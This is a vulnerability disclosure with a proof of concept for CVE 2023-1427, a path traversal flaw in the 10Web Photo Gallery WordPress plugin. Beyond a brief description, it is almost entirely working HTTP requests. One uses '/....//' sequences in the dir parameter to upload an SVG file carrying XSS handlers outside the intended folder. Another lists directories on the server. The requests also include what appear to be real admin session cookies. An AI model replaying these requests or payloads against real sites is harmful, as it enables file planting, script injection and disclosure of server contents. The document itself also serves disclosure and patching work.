Photo Gallery by 10Web < 1.8.15 – Admin+ Path Traversal | CVE 2023-1427

Description

- The plugin did not ensure that uploaded files are kept inside its uploads folder, allowing high privilege users to put images anywhere in the filesystem via a path traversal vector.

- Path Traversal Vulnerabillity also allows listing the entire folder & image file in the system.

Proof of Concept

- The below requests will put the svg_to_xss.svg file into the /wp-content/uploads/ folder rather than /wp-content/uploads/photo-gallery/

POST /wordpress/wp-admin/admin-ajax.php?bwg_nonce=77c06f6311&action=bwg_upl&dir=/....//....//....// HTTP/1.1
Host: {host}
Content-Length: 2845
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysAMZOiWPOOk33DG8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Cookie: {cookie}

------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="bwg_nonce"

70ebb31e6c
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/admin-ajax.php?action=addImages&bwg_width=0&bwg_height=0&callback=bwg_add_image&bwg_nonce=b37a4be11b
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_thumb_width"

500
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_thumb_height"

500
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_img_width"

1200
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="upload_img_height"

1200
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="task"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="extensions"

jpg,jpeg,png,gif,svg
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="callback"

bwg_add_image
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="sort_by"

date_modified
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="sort_order"

desc
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="items_view"

thumbs
------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="dir"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="file_names"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="file_namesML"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="file_new_name"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="new_dir_name"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_task"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_files"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_src"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="clipboard_dest"


------WebKitFormBoundarysAMZOiWPOOk33DG8
Content-Disposition: form-data; name="files[]"; filename="svg_to_xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="alert()">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <img src='1' onerror='alert()' />
</svg>
------WebKitFormBoundarysAMZOiWPOOk33DG8--



- The below requests will list the entire folder & image file in the system.

POST /wordpress/wp-admin/admin-ajax.php?action=addImages&bwg_width=800&bwg_height=550&callback=bwg_add_preview_image&bwg_nonce=b37a4be11b& HTTP/1.1
Host: localhost
Content-Length: 62
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1678082021%7CZJFi4Nio3N58N3fHJQETRb5O7PsSKV3KSwzHU606kax%7C7fee9203d7bfbbc77f90d0a9b9872d0ea8bf7b1ccfa9f43ced48936bbc98b05c; wordpress_test_cookie=WP%20Cookie%20check; pvc_visits[0]=1677949198b1; wp_lang=en_US; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1678082021%7CZJFi4Nio3N58N3fHJQETRb5O7PsSKV3KSwzHU606kax%7Cb76a29cd3f196f659d63ecb2bf9c7bb4d158aa0b03f274379bf45e4162030338; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1677909222; tk_ai=%2B8CRtWYwxLjZLIFmx4D5%2FaoH; redux_current_tab=settings; redux_current_tab_get=settings; redux_current_tab_wpml_settings=1; wordpress_apbct_antibot=0050792dac2aebc2f8264b54205dbd73de813c365ef1d1d92377c094cf3bc336; ct_paused_spam_check=0; apbct_check_comments_offset=200; ct_check_users__amount=100; ct_paused_users_check=0; apbct_check_users_offset=0

bwg_nonce=70ebb31e6c&dir=/....//....//....//....//....//....//